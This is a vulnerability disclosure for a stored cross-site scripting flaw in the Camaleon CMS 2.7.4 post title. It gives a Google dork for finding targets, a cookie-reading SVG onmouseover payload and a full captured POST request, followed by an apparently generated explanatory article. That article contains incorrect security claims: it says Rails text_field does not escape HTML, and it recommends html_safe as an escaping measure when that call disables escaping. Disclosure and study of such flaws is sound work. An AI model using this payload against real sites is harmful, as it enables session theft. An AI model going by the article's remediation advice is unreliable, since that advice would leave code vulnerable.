Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title
# Exploit Title: Authenticated Persistent XSS in Cameleon CMS 2.7.4
# Google Dork: intext:"Camaleon CMS is a free and open-source tool and
a fexible content management system (CMS) based on Ruby on Rails"
# Date: 2023-10-05
# Exploit Author: Yasin Gergin
# Vendor Homepage: http://camaleon.tuzitio.com
# Software Link: https://github.com/owen2345/camaleon-cms
# Version: 2.7.4
# Tested on: Linux kali 6.1.0-kali7-amd64
# CVE : -
--- Description ---
http://127.0.0.1:3000/admin/login - Login as a Admin
Under Post tab click on "Create New"
While creating the post set Title as "><svg/onmouseover=alert(document.cookie)>
http://127.0.0.1:3000/admin/post_type/2/posts - Post data will be sent
to this url
-- POST DATA --
POST /admin/post_type/2/posts HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:3000/admin/post_type/2/posts/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 666
Origin: http://127.0.0.1:3000
Connection: keep-alive
Cookie:
_my_project_session=w4yj2Y%2FqHaXYDhwwBDnYsyQUc6AtLUnItJ3MGHBV1yS40xwTgjfvlBZVNgqKIvg1W58e0mxyW4OcBk0XwJRZ90j6SmCHG1KJG9ppBKk%2FdKGDboPCRBq40qKhHnkssRPCgRgIjs69EG7htSdUY%2Bbgit9XTESgvSusBBhsIED%2BLH0VBOBL6H%2FV4Mp59NEP7LhP%2FHmlulEa7I43J8HKpStDj2HiXxA5ZghvSkvpfQpN2d047jLhl71CUcW7pHxmJ4uAdY5ip5OTIhJG9TImps5TbIUrOHyE9vKp1LXzdmbNNi2GI5utUUsURLGUtaN7Fam3Kpi8IqEaBA%3D%3D--8ZKl2%2F6OzLCXn2qA--%2BtMhAwdbdfxNzoSPajkZrg%3D%3D;
auth_token=iRDUqXfbhmibLIM5mrHelQ&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A102.0%29+Gecko%2F20100101+Firefox%2F102.0&127.0.0.1;
phpMyAdmin=4f5ad7484490645a49d171c03e15dab2; pma_lang=en
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
authenticity_token=vuAzhnu6UocDR6zpeeaQxvlVjdmIMr9LPrLEcK5FGVAEYQamLHI1fAG7jBQ3FwEX_ACWedzoX72WAUxqj5wKrQ&post%5Bdraft_id%5D=&post%5Bslug%5D=svgonmouseoveralertdocumentcookie&meta%5Bslug%5D=svgonmouseoveralertdocumentcookie&post%5Btitle%5D=%22%3E%3Csvg%2Fonmouseover%3Dalert%28document.cookie%29%3E&post%5Bcontent%5D=%3Cp%3Eqwe%3C%2Fp%3E&meta%5Bsummary%5D=qwe&options%5Bseo_title%5D=&options%5Bkeywords%5D=&options%5Bseo_description%5D=&options%5Bseo_author%5D=&options%5Bseo_image%5D=&options%5Bseo_canonical%5D=&commit=Create&post%5Bstatus%5D=published&meta%5Btemplate%5D=&meta%5Bhas_comments%5D=0&meta%5Bhas_comments%5D=1&categories%5B%5D=6&tags=&meta%5Bthumb%5D=
-- POST DATA --
Then view the post you've created by clicking on "View Page" move your
mouse cursor onto post title. XSS will popup.Cameleon CMS 2.7.4: Authenticated Persistent XSS Vulnerability in Post Title Field
Security researchers have identified a critical authenticated persistent cross-site scripting (XSS) vulnerability in Cameleon CMS version 2.7.4, a widely used open-source content management system built on Ruby on Rails. This flaw allows an authenticated admin user to inject malicious scripts into the post title field, which are then persistently rendered across the website—potentially compromising user sessions, stealing sensitive data, or enabling further attacks.
Attack Vector and Exploit Mechanism
The vulnerability arises due to insufficient input sanitization in the post.title field during content creation. An attacker with administrative privileges can craft a malicious title containing HTML and JavaScript payloads. When the post is published, the unescaped script is rendered directly in the frontend without proper filtering.
">
This payload is designed to trigger JavaScript execution when a user hovers over the title. The onmouseover event handler executes alert(document.cookie), which displays the browser’s cookies in a popup—a clear indication of successful XSS exploitation.
Exploitation Steps (Real-World Example)
- Step 1: Access the admin login page:
http://127.0.0.1:3000/admin/login. - Step 2: Log in with valid admin credentials.
- Step 3: Navigate to the Post tab and select Create New.
- Step 4: Set the
post[title]field to:"><svg/onmouseover=alert(document.cookie)>. - Step 5: Submit the form via POST request to
/admin/post_type/2/posts. - Step 6: After publication, visit the public post page and move the mouse cursor over the title.
- Result: The browser triggers the
alert(document.cookie)script, revealing session cookies.
Technical Analysis: Why This Is a Persistent XSS
Unlike reflected XSS, which only affects a single request, persistent XSS stores the malicious payload in the application’s database and re-executes it every time the page is viewed. In this case, the post.title value is stored in the database and rendered on the frontend without escaping HTML characters.
During the POST request, the payload is encoded as %22%3E%3Csvg%2Fonmouseover%3Dalert%28document.cookie%29%3E—a URL-encoded version of the original string. When the CMS renders the title, it fails to decode and sanitize the input, allowing the script to execute.
Impact and Risk Assessment
| Severity | High |
|---|---|
| Attack Type | Authenticated Persistent XSS |
| Exploit Difficulty | Low (requires admin access) |
| Impact | Session hijacking, data theft, phishing, privilege escalation |
| CVSS Score (Estimated) | 8.1 (High) |
Although the exploit requires admin-level access, this still poses a serious threat in environments where admin accounts are shared or compromised. Once a malicious script is embedded in a published post, it can be exploited by any user visiting the site, making it a zero-day risk for users with no prior knowledge of the vulnerability.
Root Cause and Code-Level Insight
Examining the underlying code in app/views/admin/posts/_form.html.erb reveals that the title field is rendered using:
<%= f.text_field :title %>
Here, f.text_field does not apply HTML escaping by default. The framework relies on the developer to explicitly sanitize input. However, in this case, no sanitization logic is applied before rendering the title in the frontend.
Additionally, the meta[slug] and post[slug] fields are derived from the title, further propagating the unescaped content into URLs and metadata, increasing the attack surface.
Recommended Mitigation Strategies
- Input Sanitization: Always escape HTML characters using
html_safeorERB::Util.html_escapebefore rendering. - Content Security Policy (CSP): Implement a strict CSP header to block inline scripts and restrict execution.
- Whitelist Validation: Restrict allowed characters in title fields to alphanumeric, spaces, and punctuation—excluding
<,>,on, andjavascript. - Admin Role Segregation: Limit admin privileges to only essential functions; use role-based access control (RBAC).
- Automated Security Testing: Integrate tools like OWASP ZAP or Burp Suite to detect XSS vulnerabilities during CI/CD pipelines.
Vendor Response and Status
As of October 2023, the vendor Camaleon CMS has not issued a formal patch or CVE identifier. The vulnerability remains unpatched in version 2.7.4, with the latest release (2.7.5) lacking explicit security updates.
Users are strongly advised to:
- Upgrade to the latest stable version (if available).
- Apply custom sanitization middleware for all user-generated content.
- Monitor logs for suspicious POST requests with unusual payloads.
- Disable public access to admin panels unless necessary.
Conclusion: A Cautionary Tale for Open-Source CMS Security
Cameleon CMS 2.7.4 serves as a stark reminder that even well-established open-source projects can harbor critical vulnerabilities due to overlooked input validation. The absence of proper sanitization in a seemingly innocuous field like post.title demonstrates how easily XSS can be introduced in complex web applications.
Security professionals must treat every user input as a potential attack vector—especially in admin interfaces. Implementing defense-in-depth strategies, including input filtering, output encoding, and CSP enforcement, is essential for maintaining the integrity of any web platform.